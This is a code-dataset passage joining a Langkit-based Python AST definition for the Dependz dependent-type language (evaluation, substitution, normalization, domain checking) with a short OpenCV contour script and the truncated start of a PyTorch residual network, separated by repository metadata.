Var(Self.cast_or_raise(Apply))\n elim_evaled = Var(elim_call.lhs.eval.cast(Apply))\n return If(\n Self.is_match_application,\n elim_evaled.rhs.extract_case_and_eval(\n elim_call.rhs.eval\n )._or(Self),\n Self\n )\n\n @langkit_property(public=True, return_type=T.Term, memoized=True)\n def eval():\n return Self.match(\n lambda id=Identifier: id.intro._.definition.then(\n lambda d: d.term.node.eval,\n default_val=id\n ),\n lambda ap=Apply: ap.lhs.eval.cast(Abstraction).then(\n lambda ab: ab.term.substitute(ab.ident.sym, ap.rhs).eval,\n default_val=ap.eval_match\n ),\n lambda ab=Abstraction: ab.term.cast(Apply).then(\n lambda ap: If(\n And(\n ap.rhs.cast(Identifier)._.sym == ab.ident.sym,\n Not(ap.lhs.is_free(ab.ident.sym))\n ),\n ap.lhs.eval,\n ab\n ),\n )._or(ab),\n lambda ar=Arrow: ar\n )\n\n @langkit_property(public=True, return_type=T.Bool)\n def equivalent_entities(other=T.Term.entity):\n return Entity.node.equivalent(other.node)\n\n @langkit_property(return_type=T.Bool, memoized=True)\n def equivalent(other=T.Term):\n return Self.match(\n lambda id=Identifier: other.cast(Identifier).then(\n lambda o: o.sym == id.sym\n ),\n lambda ap=Apply: other.cast(Apply).then(\n lambda o: And(\n ap.lhs.equivalent(o.lhs),\n ap.rhs.equivalent(o.rhs)\n )\n ),\n lambda ab=Abstraction: other.cast(Abstraction).then(\n lambda o: ab.term.free_fresh_symbol(\"eq\", o.term).then(\n lambda sym:\n ab.term.rename(ab.ident.sym, sym).equivalent(\n o.term.rename(o.ident.sym, sym)\n )\n )\n ),\n lambda ar=Arrow: other.cast(Arrow).then(\n lambda o: And(\n ar.lhs.equivalent(o.lhs),\n ar.rhs.equivalent(o.rhs),\n ar.binder.then(\n lambda b: o.binder.then(\n lambda ob: Or(\n b.equivalent(ob),\n And(\n Not(ar.has_constraining_binder),\n 
Not(o.has_constraining_binder)\n )\n ),\n default_val=Not(ar.has_constraining_binder)\n ),\n default_val=Not(o.has_constraining_binder)\n )\n )\n )\n )\n\n @langkit_property(return_type=T.Term)\n def substitute_all(substs=Substitution.array, idx=(T.Int, 0),\n unsafe=(T.Bool, False)):\n return substs.at(idx).then(\n lambda r: Self.substitute(\n r.from_symbol,\n r.to_term,\n unsafe\n ).substitute_all(\n substs, idx + 1, unsafe\n ),\n default_val=Self\n )\n\n @langkit_property(public=True, return_type=T.Term, memoized=True)\n def substitute(sym=T.Symbol, val=T.Term, unsafe=(T.Bool, False)):\n return Self.match(\n lambda id=Identifier: If(\n id.sym == sym,\n val,\n id\n ),\n lambda ap=Apply: ap.make_apply(\n ap.lhs.substitute(sym, val, unsafe),\n ap.rhs.substitute(sym, val, unsafe)\n ),\n lambda ab=Abstraction: If(\n ab.ident.sym == sym,\n ab,\n If(\n val.is_free(ab.ident.sym) & Not(unsafe),\n ab.term.free_fresh_symbol(ab.ident.sym).then(\n lambda symp: ab.make_abstraction(\n ab.make_ident(symp),\n ab.term\n .rename(ab.ident.sym, symp)\n .substitute(sym, val, False)\n )\n ),\n ab.make_abstraction(\n ab.ident,\n ab.term.substitute(sym, val, unsafe)\n )\n )\n ),\n lambda ar=Arrow: Self.make_arrow(\n ar.lhs.substitute(sym, val, unsafe),\n ar.rhs.substitute(sym, val, unsafe),\n ar.binder._.substitute(sym, val, unsafe)\n )\n )\n\n @langkit_property(return_type=T.Term, memoized=True)\n def anti_substitute(val=T.Term, sym=T.Symbol):\n return If(\n Self.equivalent(val),\n Self.make_ident(sym),\n Self.match(\n lambda id=Identifier: id,\n lambda ap=Apply: ap.make_apply(\n ap.lhs.anti_substitute(val, sym),\n ap.rhs.anti_substitute(val, sym)\n ),\n lambda ab=Abstraction: ab.make_abstraction(\n ab.ident.anti_substitute(val, sym)\n .cast_or_raise(Identifier),\n ab.term.anti_substitute(val, sym)\n ),\n lambda ar=Arrow: ar.make_arrow(\n ar.lhs.anti_substitute(val, sym),\n ar.rhs.anti_substitute(val, sym),\n ar.binder._.anti_substitute(val, sym)\n )\n )\n )\n\n @langkit_property(return_type=T.Bool, memoized=True)\n def contains_term(t=T.Term, include_self=(T.Bool, False)):\n return If(\n include_self & Self.equivalent(t),\n True,\n Self.match(\n lambda id=Identifier: False,\n lambda ap=Apply: Or(\n ap.lhs.contains_term(t, True),\n ap.rhs.contains_term(t, True)\n ),\n lambda ab=Abstraction: Or(\n ab.ident.contains_term(t, True),\n ab.term.contains_term(t, True)\n ),\n lambda ar=Arrow: Or(\n ar.lhs.contains_term(t, True),\n ar.rhs.contains_term(t, True),\n ar.binder._.contains_term(t, True)\n )\n )\n )\n\n @langkit_property(return_type=T.Term.entity)\n def normalized_entities():\n return Entity.node.normalize.as_entity\n\n @langkit_property(public=True, return_type=T.Term, memoized=True)\n def normalize():\n evaled = Var(Self.eval)\n to_norm = Var(Cond(\n # prevent infinite evaluation\n evaled.contains_term(Self),\n Self,\n\n Not(Self.is_free(\"match\")) & evaled.is_free(\"match\"),\n Self,\n\n evaled\n ))\n\n return to_norm.match(\n lambda id=Identifier: id,\n lambda ap=Apply: ap.make_apply(\n ap.lhs.normalize,\n ap.rhs.normalize\n ),\n lambda ab=Abstraction: ab.make_abstraction(\n ab.ident,\n ab.term.normalize\n ),\n lambda ar=Arrow: ar.make_arrow(\n ar.lhs.normalize,\n ar.rhs.normalize,\n ar.binder._.normalize\n )\n )\n\n @langkit_property(return_type=T.Term)\n def rename_all(renamings=Renaming.array, idx=(T.Int, 0)):\n return renamings.at(idx).then(\n lambda r:\n Self.rename(r.from_symbol, r.to_symbol).rename_all(\n renamings, idx + 1\n ),\n default_val=Self\n )\n\n @langkit_property(return_type=T.Term, 
public=True, memoized=True)\n def rename(old=T.Symbol, by=T.Symbol):\n return Self.match(\n lambda id=Identifier: If(\n id.sym == old,\n id.make_ident(by),\n id\n ),\n lambda ap=Apply: ap.make_apply(\n ap.lhs.rename(old, by),\n ap.rhs.rename(old, by)\n ),\n lambda ab=Abstraction: If(\n old == ab.ident.sym,\n ab,\n ab.make_abstraction(\n ab.ident,\n ab.term.rename(old, by)\n )\n ),\n lambda ar=Arrow: ar.make_arrow(\n ar.lhs.rename(old, by),\n ar.rhs.rename(old, by),\n ar.binder._.rename(old, by)\n )\n )\n\n @langkit_property(return_type=T.LogicVar, memoized=True)\n def domain_var():\n return Self.create_logic_var\n\n @langkit_property(return_type=T.Identifier.array)\n def find_occurrences(sym=T.Symbol):\n return Self.match(\n lambda id=Identifier: If(\n id.sym == sym,\n id.singleton,\n No(Identifier.array)\n ),\n\n lambda ap=Apply:\n ap.lhs.find_occurrences(sym)\n .concat(ap.rhs.find_occurrences(sym)),\n\n lambda ab=Abstraction: If(\n ab.ident.sym == sym,\n No(Identifier.array),\n ab.term.find_occurrences(sym)\n ),\n\n lambda ar=Arrow:\n ar.lhs.find_occurrences(sym)\n .concat(ar.rhs.find_occurrences(sym))\n .concat(ar.binder._.find_occurrences(sym))\n )\n\n @langkit_property(return_type=T.Term.array)\n def flat_terms():\n return Self.singleton.concat(Self.match(\n lambda ap=Apply:\n ap.lhs.flat_terms.concat(ap.rhs.flat_terms),\n\n lambda ab=Abstraction:\n ab.ident.flat_terms.concat(ab.term.flat_terms),\n\n lambda ar=Arrow:\n ar.lhs.flat_terms\n .concat(ar.rhs.flat_terms)\n .concat(ar.binder._.flat_terms),\n\n lambda _: No(Term.array)\n ))\n\n @langkit_property(return_type=T.DomainEquation,\n uses_entity_info=False,\n activate_tracing=True)\n def domain_equation(bindings=Binding.array):\n relevant_binding = Var(bindings.find(\n lambda b: b.target == Self\n ))\n\n result = Var(Self.match(\n lambda id=Identifier: id.intro.then(\n lambda intro: Cond(\n Not(relevant_binding.is_null),\n DomainEquation.new(\n eq=LogicTrue(),\n templates=No(Identifier.array)\n ),\n\n intro.generic_formals.length > 0,\n DomainEquation.new(\n eq=LogicTrue(),\n templates=id.singleton\n ),\n\n DomainEquation.new(\n eq=Bind(\n Self.domain_var, intro.term.normalized_entities,\n conv_prop=Term.normalized_entities,\n eq_prop=Term.equivalent_entities\n ),\n templates=No(Identifier.array)\n )\n ),\n default_val=DomainEquation.new(\n eq=LogicTrue(),\n templates=No(Identifier.array)\n )\n ),\n lambda ap=Apply: Let(\n lambda\n lhs_eq=ap.lhs.domain_equation(bindings),\n rhs_eq=ap.rhs.domain_equation(bindings):\n\n DomainEquation.new(\n eq=And(\n lhs_eq.eq,\n rhs_eq.eq,\n Bind(ap.lhs.domain_var, ap.rhs.domain_var,\n conv_prop=Arrow.param,\n eq_prop=Term.equivalent_entities),\n Bind(ap.lhs.domain_var, ap.domain_var,\n conv_prop=Arrow.result,\n eq_prop=Term.equivalent_entities)\n ),\n templates=lhs_eq.templates.concat(rhs_eq.templates)\n )\n ),\n lambda ab=Abstraction: Let(\n lambda term_eq=ab.term.domain_equation(bindings):\n\n DomainEquation.new(\n eq=And(\n ab.term.find_occurrences(ab.ident.sym).logic_all(\n lambda id: Bind(\n ab.ident.domain_var, id.domain_var,\n conv_prop=Term.normalized_entities,\n eq_prop=Term.equivalent_entities\n ),\n ),\n Bind(ab.domain_var, ab.ident.domain_var,\n conv_prop=Arrow.param,\n eq_prop=Term.equivalent_entities),\n Bind(ab.domain_var, ab.term.domain_var,\n conv_prop=Arrow.result,\n eq_prop=Term.equivalent_entities),\n term_eq.eq\n ),\n templates=term_eq.templates\n )\n ),\n\n lambda ar=Arrow: Let(\n lambda\n lhs_eq=ar.lhs.domain_equation(bindings),\n rhs_eq=ar.rhs.domain_equation(bindings),\n 
binder_eq=ar.binder.then(\n lambda b: b.domain_equation(bindings),\n default_val=DomainEquation.new(\n eq=LogicTrue(),\n templates=No(Identifier.array)\n )\n ):\n\n DomainEquation.new(\n eq=And(\n lhs_eq.eq,\n rhs_eq.eq,\n binder_eq.eq,\n\n ar.binder.then(\n lambda b: Bind(\n b.domain_var, ar.lhs.normalize.as_bare_entity,\n eq_prop=Term.equivalent_entities\n ),\n default_val=LogicTrue()\n ),\n\n Or(\n And(\n Predicate(Term.is_highest_ranked_term,\n ar.lhs.domain_var, ar.rhs.domain_var),\n Bind(ar.domain_var, ar.lhs.domain_var,\n eq_prop=Term.equivalent_entities),\n ),\n And(\n Predicate(Term.is_highest_ranked_term,\n ar.rhs.domain_var, ar.lhs.domain_var),\n Bind(ar.domain_var, ar.rhs.domain_var,\n eq_prop=Term.equivalent_entities)\n )\n )\n ),\n templates=lhs_eq.templates.concat(\n rhs_eq.templates\n ).concat(\n binder_eq.templates\n )\n )\n )\n ))\n\n return relevant_binding.then(\n lambda b: DomainEquation.new(\n eq=Bind(\n Self.domain_var, b.domain_val.as_bare_entity,\n eq_prop=Term.equivalent_entities\n ) & result.eq,\n templates=result.templates\n ),\n default_val=result\n )\n\n @langkit_property(public=False, return_type=TypingsDescription,\n activate_tracing=True)\n def instantiate_templates(result_domain=T.Term,\n templates=Template.array,\n reps=T.Substitution.array):\n must_synthesize_arrow = Var(\n Self.cast(Abstraction).then(\n lambda ab: result_domain.cast(Arrow).then(\n lambda ar: False,\n default_val=True\n ),\n default_val=False\n )\n )\n actual_result_domain = Var(If(\n must_synthesize_arrow,\n Let(\n lambda\n lhs_sym=Self.unique_fresh_symbol(\"lhs\"),\n rhs_sym=Self.unique_fresh_symbol(\"rhs\"),\n binder_sym=Self.unique_fresh_symbol(\"binder\"):\n\n Self.make_arrow(\n Self.make_ident(lhs_sym),\n Self.make_ident(rhs_sym),\n Self.make_ident(binder_sym)\n )\n ),\n result_domain\n ))\n instantiation = Var(Self.instantiate_templates_impl(\n actual_result_domain,\n templates,\n reps\n ))\n return If(\n must_synthesize_arrow,\n Let(\n lambda ar=actual_result_domain.cast_or_raise(Arrow):\n\n TypingsDescription.new(\n bindings=instantiation.bindings,\n equations=instantiation.equations.concat(\n UnifyQuery.new(\n first=ar,\n second=result_domain\n ).singleton\n ),\n new_symbols=instantiation.new_symbols.concat(\n ArrayLiteral([\n ar.lhs.cast(Identifier).sym,\n ar.rhs.cast(Identifier).sym,\n ar.binder.cast(Identifier).sym\n ])\n )\n )\n ),\n instantiation\n )\n\n @langkit_property(public=False, return_type=TypingsDescription)\n def instantiate_templates_impl(result_domain=T.Term,\n templates=Template.array,\n reps=T.Substitution.array):\n def make_binding(domain):\n return Binding.new(\n target=Self,\n domain_val=domain\n )\n\n def rec_apply(ap, f):\n return Let(\n lambda\n lhs_res=ap.lhs.instantiate_templates(\n result_domain.then(\n lambda r_dom: Self.make_arrow(No(T.Term), r_dom)\n ),\n templates,\n reps\n ): Let(\n lambda\n rhs_res=ap.rhs.instantiate_templates(\n lhs_res.bindings.at(0).domain_val.cast(Arrow)._.lhs,\n templates, reps\n ):\n\n f(lhs_res, rhs_res)\n )\n )\n\n templated_result = Var(Self.match(\n lambda id=Identifier: TypingsDescription.new(\n bindings=templates.find(lambda t: t.origin == id).then(\n lambda t: t.instance,\n default_val=id.domain_val._or(result_domain)\n ).then(\n lambda dom: make_binding(dom)\n ).singleton,\n\n equations=No(UnifyQuery.array),\n\n new_symbols=No(Symbol.array)\n ),\n\n lambda ap=Apply: rec_apply(\n ap,\n lambda lhs_res, rhs_res: Let(\n lambda qs=rhs_res.bindings.at(0).domain_val.then(\n lambda rhs_dom: UnifyQuery.new(\n 
first=lhs_res.bindings.at(0)\n .domain_val.cast(Arrow).lhs,\n second=rhs_dom\n ).singleton\n ).concat(\n lhs_res.bindings.at(0)\n .domain_val.cast(Arrow)._.binder.then(\n lambda b: UnifyQuery.new(\n first=b,\n second=rhs_res.bindings.at(0)\n .target.substitute_all(reps).normalize\n ).singleton\n )\n ):\n\n TypingsDescription.new(\n bindings=make_binding(\n lhs_res.bindings.at(0)\n .domain_val.cast_or_raise(Arrow).rhs\n ).singleton.concat(\n lhs_res.bindings\n ).concat(\n rhs_res.bindings\n ),\n\n equations=lhs_res.equations.concat(\n rhs_res.equations\n ).concat(\n qs\n ),\n\n new_symbols=lhs_res.new_symbols.concat(\n rhs_res.new_symbols\n )\n )\n )\n ),\n\n lambda ab=Abstraction: Let(\n lambda\n term_res=ab.term.instantiate_templates(\n result_domain.cast(Arrow)._.rhs,\n templates,\n reps.filter(\n lambda s: s.from_symbol != ab.ident.sym\n ).concat(result_domain.cast(Arrow)._.binder.then(\n lambda b: Substitution.new(\n from_symbol=ab.ident.sym,\n to_term=b\n ).singleton\n ))\n ),\n id_dom=ab.ident.domain_val._or(\n result_domain.cast(Arrow)._.lhs\n ):\n\n TypingsDescription.new(\n bindings=id_dom.then(\n lambda lhs_dom:\n\n term_res.bindings.at(0).domain_val.then(\n lambda rhs_dom: make_binding(\n Self.make_arrow(\n lhs_dom,\n rhs_dom,\n result_domain.cast(Arrow)._.binder\n )\n )\n )\n ).singleton.concat(term_res.bindings),\n\n equations=term_res.equations.concat(id_dom.then(\n lambda lhs_dom:\n ab.term.find_occurrences(ab.ident.sym).map(\n lambda id: term_res.bindings.find(\n lambda b: b.target == id\n ).then(\n lambda b: UnifyQuery.new(\n first=lhs_dom,\n second=b.domain_val\n )\n )\n )\n )),\n\n new_symbols=term_res.new_symbols\n )\n ),\n\n lambda ar=Arrow: Let(\n lambda\n lhs_res=ar.lhs.instantiate_templates(\n No(Term), templates, reps\n ),\n rhs_res=ar.rhs.instantiate_templates(\n No(Term), templates, reps\n ),\n binder_res=ar.binder.then(\n lambda b: b.instantiate_templates(\n ar.lhs, templates, reps\n )\n ),\n new_sym=Self.unique_fresh_symbol(\"arrow\"):\n\n TypingsDescription.new(\n bindings=make_binding(\n Self.make_ident(new_sym)\n ).singleton.concat(\n lhs_res.bindings\n ).concat(\n rhs_res.bindings\n ).concat(\n binder_res.bindings\n ),\n\n equations=lhs_res.equations.concat(\n rhs_res.equations\n ).concat(\n binder_res.equations\n ),\n\n new_symbols=new_sym.singleton.concat(\n lhs_res.new_symbols\n ).concat(\n rhs_res.new_symbols\n )\n )\n )\n ))\n\n return Self.domain_val.then(\n lambda expected_dom:\n\n templated_result.bindings.at(0).domain_val.then(\n lambda found_dom: Let(\n lambda q=UnifyQuery.new(\n first=found_dom,\n second=expected_dom\n ):\n\n TypingsDescription.new(\n bindings=templated_result.bindings,\n equations=q.singleton.concat(\n templated_result.equations\n ),\n new_symbols=templated_result.new_symbols\n )\n )\n ),\n default_val=templated_result\n )\n\n @langkit_property(return_type=Bool)\n def reset_domain_vars():\n return Self.flat_terms.logic_all(\n lambda x: Bind(x.domain_var, No(Term.entity))\n ).solve\n\n @langkit_property(public=False, return_type=T.Bool)\n def check_domains_internal(expected_domain=T.Term,\n bindings=Binding.array, tries=T.Int):\n term_eq = Var(Self.domain_equation(bindings))\n domain_eq = Var(And(\n Bind(Self.domain_var, expected_domain.as_bare_entity,\n eq_prop=Term.equivalent_entities),\n term_eq.eq\n ))\n return term_eq.templates.then(\n lambda templates: (tries != 0) & Try(\n Self.solve_allowing_orphans(domain_eq),\n True\n ).then(lambda _: Let(\n lambda instances=templates.map(\n lambda t: t.intro.as_template(t)\n ):\n\n 
Self.instantiate_templates(\n expected_domain,\n instances,\n No(Substitution.array)\n ).then(lambda result: Self.check_domains_internal(\n expected_domain,\n Let(\n lambda substs=Self.unify_all(\n result.equations,\n instances.mapcat(\n lambda i: i.new_symbols\n ).concat(\n result.new_symbols\n )\n ): result.bindings.map(\n lambda b: Binding.new(\n target=b.target,\n domain_val=\n b.domain_val.substitute_all(substs).normalize\n )\n ).filter(\n lambda b: b.domain_val.free_symbols.all(\n lambda sym: Not(instances.any(\n lambda i: i.new_symbols.contains(sym)\n ))\n )\n )\n ),\n tries - 1\n ))\n )),\n default_val=domain_eq.solve\n )\n\n @langkit_property(return_type=T.Bool, activate_tracing=True,\n dynamic_vars=[unification_context])\n def has_domain(domain_val=T.Term.entity):\n constrained_term = Var(Self.solve_time_substitution)\n domain_term = Var(domain_val.node.solve_time_substitution)\n\n ignore(Var(constrained_term.reset_domain_vars))\n\n return Try(\n constrained_term.check_domains_internal(\n domain_term, No(Binding.array), -1\n ),\n False\n )\n\n @langkit_property(return_type=T.Equation,\n dynamic_vars=[unification_context])\n def has_domain_equation(other=T.Term):\n # Use the fact that predicates with more than 1 var are evaluated last\n vars = Var(unification_context.vars)\n term_var = Var(vars.elem(Self.unique_fresh_symbol(\"$tmp_trm\")))\n domain_var = Var(vars.elem(Self.unique_fresh_symbol(\"$tmp_dom\")))\n return And(\n Bind(term_var, Self.as_bare_entity),\n Bind(domain_var, other.as_bare_entity),\n Predicate(Term.has_domain, term_var, domain_var)\n )\n\n @langkit_property(return_type=T.Term, public=True)\n def domain_val():\n return Self.domain_var.get_value._.node.cast_or_raise(Term)\n\n @langkit_property(return_type=T.Bool)\n def is_highest_ranked_term(other=DependzNode.entity):\n other_term = Var(other.cast_or_raise(Term).node)\n return Self.self_or_higher_ranked_term(other_term) == Self\n\n @langkit_property(return_type=T.Term, memoized=True)\n def self_or_higher_ranked_term(other=T.Term):\n self_chain = Var(Self.domain_chain)\n other_chain = Var(other.domain_chain)\n first_common = Var(self_chain.find(\n lambda d1: other_chain.any(\n lambda d2: d1.equivalent(d2)\n )\n ))\n return first_common._or(PropertyError(Term, \"Terms are incompatible\"))\n\n @langkit_property(return_type=T.Term.array, memoized=True)\n def domain_chain():\n id = Var(Self.cast_or_raise(Identifier))\n domain = Var(id.intro._.term)\n return Self.singleton.concat(If(\n domain.cast(Identifier).then(lambda d: d.intro._.term == domain),\n domain.node.singleton,\n domain._.domain_chain\n ))\n\n\n@abstract\nclass Identifier(Term):\n sym = AbstractProperty(type=Symbol)\n\n to_string = Property(Self.sym.image)\n\n @langkit_property(public=True, return_type=T.Bool)\n def is_introducing():\n return Self.parent.cast(Introduction).then(\n lambda i: i.ident == Self\n )\n\n @langkit_property(public=True, return_type=T.Introduction.entity,\n memoized=True)\n def intro():\n return Self.node_env.get_first(Self.sym).cast(Introduction)\n\n\nclass SourceId(Identifier):\n token_node = True\n sym = Property(Self.symbol)\n\n\n@synthetic\nclass SyntheticId(Identifier):\n name = UserField(type=T.Symbol)\n sym = Property(Self.name)\n\n\nclass Apply(Term):\n lhs = Field(type=Term)\n rhs = Field(type=Term)\n\n to_string = Property(String(\"(\").concat(\n Self.lhs.to_string.concat(String(' ')).concat(Self.rhs.to_string)\n ).concat(String(\")\")))\n\n @langkit_property(return_type=Term)\n def left_most_term():\n return 
Self.lhs.cast(Apply).then(\n lambda ap: ap.left_most_term,\n default_val=Self.lhs\n )\n\n @langkit_property(return_type=Term)\n def replace_left_most_term_with(other=Term):\n return Self.make_apply(\n Self.lhs.cast(Apply).then(\n lambda ap: ap.replace_left_most_term_with(other),\n default_val=other\n ),\n Self.rhs\n )\n\n @langkit_property(return_type=Term.entity.array, public=True)\n def as_term_array():\n return Self.left_most_term.as_bare_entity.singleton.concat(\n Self.call_args.map(lambda x: x.as_bare_entity)\n )\n\n\n@synthetic\nclass SyntheticApply(Apply):\n pass\n\n\nclass Abstraction(Term):\n ident = Field(type=Identifier)\n term = Field(type=Term)\n\n @langkit_property()\n def to_string():\n actual_self = Var(If(\n Self.is_synthesized,\n Self.first_available_standard_symbol.then(\n lambda s: Self.make_abstraction(\n Self.make_ident(s),\n Self.term.rename(Self.ident.sym, s)\n ),\n default_val=Self\n ),\n Self,\n ))\n return String(\"(\\\\\").concat(\n actual_self.ident.to_string.concat(String('. ')).concat(\n actual_self.term.to_string\n )\n ).concat(String(\")\"))\n\n @langkit_property(return_type=Bool)\n def is_synthesized():\n return Self.ident.to_string.contains(CharacterLiteral(\"$\"))\n\n @langkit_property(return_type=Symbol)\n def first_available_standard_symbol():\n return ArrayLiteral([\"x\", \"y\", \"z\", \"e\"], element_type=T.Symbol).find(\n lambda s: Not(Self.term.is_free(s))\n )\n\n\n@synthetic\nclass SyntheticAbstraction(Abstraction):\n pass\n\n\nclass Arrow(Term):\n binder = Field(type=Term)\n lhs = Field(type=Term)\n rhs = Field(type=Term)\n\n @langkit_property()\n def to_string():\n lhs_str = Var(Self.lhs._.to_string)\n rhs_str = Var(Self.rhs.to_string)\n return String('(').concat(Self.binder.then(\n lambda b: If(\n Self.has_constraining_binder,\n b.to_string.concat(String(':')).concat(lhs_str),\n lhs_str\n ),\n default_val=lhs_str\n ).concat(String(' -> ')).concat(rhs_str).concat(String(')')))\n\n @langkit_property(return_type=Term.entity)\n def param():\n return Entity.lhs.normalized_entities\n\n @langkit_property(return_type=Term.entity)\n def result():\n return Entity.rhs.normalized_entities\n\n @langkit_property(return_type=T.Bool)\n def has_constraining_binder():\n return Self.binder.then(\n lambda b: b.cast(Identifier).then(\n lambda id: If(\n id.intro.is_null,\n Self.lhs.is_free(id.sym) | Self.rhs.is_free(id.sym),\n True\n ),\n default_val=True\n )\n )\n\n\n@synthetic\nclass SyntheticArrow(Arrow):\n pass\n\n\nclass Introduction(DependzNode):\n \"\"\"\n Identifer : Term\n \"\"\"\n ident = Field(type=Identifier)\n term = Field(type=Term)\n\n @langkit_property(public=True, return_type=T.Definition.entity,\n memoized=True)\n def definition():\n return Self.children_env.get_first('__definition').cast(T.Definition)\n\n @langkit_property(public=True, return_type=T.Symbol.array,\n memoized=True)\n def generic_formals():\n return Self.term.free_symbols\n\n @langkit_property(public=True, return_type=Template)\n def as_template(origin_term=T.Term):\n renamings = Var(Self.generic_formals.map(lambda s: Renaming.new(\n from_symbol=s,\n to_symbol=Self.unique_fresh_symbol(s)\n )))\n return Template.new(\n origin=origin_term,\n instance=Self.term.rename_all(renamings).normalize,\n new_symbols=renamings.map(lambda r: r.to_symbol)\n )\n\n env_spec = EnvSpec(\n add_to_env_kv(Self.ident.sym, Self),\n add_env()\n )\n\n\n@synthetic\nclass NestedIntroduction(Introduction):\n bound_generics = UserField(type=T.Symbol.array)\n\n @langkit_property()\n def generic_formals():\n return 
Self.term.free_symbols.filter(\n lambda s: Not(Self.bound_generics.contains(s))\n )\n\n\nclass Definition(DependzNode):\n \"\"\"\n Identifier = Term\n \"\"\"\n ident = Field(type=SourceId)\n term = Field(type=Term)\n\n @langkit_property(public=True, return_type=T.String)\n def eval_and_print():\n return Self.term.normalize.to_string\n\n @langkit_property(public=True, return_type=T.Bool)\n def check_domains(tries=(T.Int, -1)):\n return Self.term.check_domains_internal(\n Self.ident.intro.term.normalize,\n No(Binding.array), tries\n )\n\n env_spec = EnvSpec(\n handle_children(),\n add_to_env_kv(\n '__definition', Self,\n dest_env=Self.ident.intro.children_env\n )\n )\n\n\nclass Program(DependzNode.list):\n @langkit_property(return_type=Introduction.array,\n memoized=True)\n def all_introductions():\n return Self.children_env.get(No(T.Symbol)).filtermap(\n lambda n: n.cast(Introduction).node,\n lambda n: n.is_a(Introduction)\n )\n\n @langkit_property(return_type=Introduction.array,\n memoized=True)\n def all_constructors():\n return Self.all_introductions.filter(\n lambda n: n.definition.is_null\n )\n\n env_spec = EnvSpec(\n add_env()\n )\n","repo_name":"Roldak/Dependz","sub_path":"dependz/language/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":86617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25390508318","text":"import cv2\r\nimport numpy as np\r\nimg = cv2.imread(\"meterP.PNG\")\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\ncanny = cv2.Canny(gray, 50, 200)\r\nB = 0\r\nG = 0\r\nR = 0\r\nn = 0\r\nr = 8\r\nh = w = r * 2 + 1\r\nkernel = np.zeros((h, w), dtype=np.uint8)\r\ncv2.circle(kernel, (r, r), r, 1, -1) \r\nopeningimg = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel)\r\nret,markerImag = cv2.threshold(openingimg,50,255,cv2.THRESH_BINARY_INV)\r\n\r\ncontours, hierarchy = cv2.findContours(markerImag,cv2.cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\nprint(len(contours))\r\nclone = img.copy()\r\nclone2 = img.copy()\r\narea=[]\r\nfor c in contours:\r\n area.append(cv2.contourArea(c))\r\nmax_area = np.argmax(np.array(area))\r\ncv2.drawContours(clone2, contours, max_area, (0, 255, 0), cv2.FILLED)\r\n#cv2.fillPoly(clone2, max_area, (0,0,255))\r\n\"\"\"\r\nfor c in contours:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n cv2.rectangle(clone, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\"\"\" \r\n\"\"\"\r\nfor c in contours:\r\n if len(c)>100:\r\n cv2.drawContours(clone, c, -1, (0, 255, 0), 2)\r\n\"\"\"\r\ncv2.imshow('openingimg', openingimg)\r\ncv2.imshow('markerImag', markerImag)\r\ncv2.imshow('img', img)\r\ncv2.imshow('clone2', clone2)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"chuyc511/Embedded_image","sub_path":"AnalogGauge/Gauge/Contour.py","file_name":"Contour.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28517264789","text":"import torch\nimport torch.nn as nn\n#import torch.nn.functional as F\nfrom opts import options\n\nopt = options()\n\ndef conv3x3(iChannels, oChannels, stride):\n return nn.Conv2d(iChannels, oChannels, (3, 3), (stride, stride), (1, 1))\n\ndef conv1x1(iChannels, oChannels, stride):\n return nn.Conv2d(iChannels, oChannels, (1, 1), (stride, stride), (0, 0))\n\nclass resBlock(nn.Module):\n def __init__(self, iChannels, oChannels, stride):\n super(resBlock, self).__init__()\n\n n = oChannels\n self.residual = nn.Sequential(\n conv3x3(int(iChannels), int(n/4), 1), 
nn.BatchNorm2d(int(n/4), 1e-3), nn.PReLU(),\n conv3x3(int(n/4), int(n/2), stride), nn.BatchNorm2d(int(n/2), 1e-3), nn.PReLU(),\n conv3x3(int(n/2), int(n), 1), nn.BatchNorm2d(int(n), 1e-3)\n )\n if stride > 1 or iChannels != n:\n self.identity = nn.Sequential(conv1x1(iChannels, oChannels, stride), nn.BatchNorm2d(int(n), 1e-3))\n else:\n self.identity = 'Identity'\n self.prelu = nn.PReLU()\n\n def forward(self, x):\n out = self.residual(x)\n if self.identity == 'Identity':\n out += x\n else:\n out += self.identity(x)\n out = self.prelu(out)\n return out\n\nclass Net(nn.Module):\n def __init__(self, iChannels, output):\n super(Net, self).__init__()\n if opt.mode == 'xy' or 'z' or 'alpha' or 'beta':\n self.features = nn.Sequential(\n nn.Conv2d(int(iChannels), 64, 7, 1, 3), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n nn.Conv2d(64, 128, 5, 1, 2), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n resBlock(128,128,1), resBlock(128,128,1), resBlock(128,128,1),\n resBlock(128,256,1),\n resBlock(256,256,1), resBlock(256,256,1), resBlock(256,256,1),\n conv1x1(256, 128, 1), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n conv1x1(128, 64, 1), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n conv1x1(64, 1, 1), nn.BatchNorm2d(1, 1e-3), nn.PReLU()\n )\n self.FCs = nn.Sequential(\n nn.Linear(opt.imHeight * opt.imWidth, 10), nn.PReLU(),\n nn.Linear(10,int(output))\n )\n self.Hardtanh = nn.Hardtanh(-opt.crange, opt.crange)\n\n if opt.mode == 'aberration':\n if opt.labelsize <= 12:\n self.features = nn.Sequential(\n nn.Conv2d(int(iChannels), 64, 7, 1, 3), nn.BatchNorm2d(64, 1e-3), nn.PReLU(),\n nn.Conv2d(64, 128, 5, 1, 2), nn.BatchNorm2d(128, 1e-3), nn.PReLU(),\n resBlock(128, 128, 1), resBlock(128, 128, 1), resBlock(128, 128, 1),\n resBlock(128, 256, 4),\n resBlock(256, 256, 1), 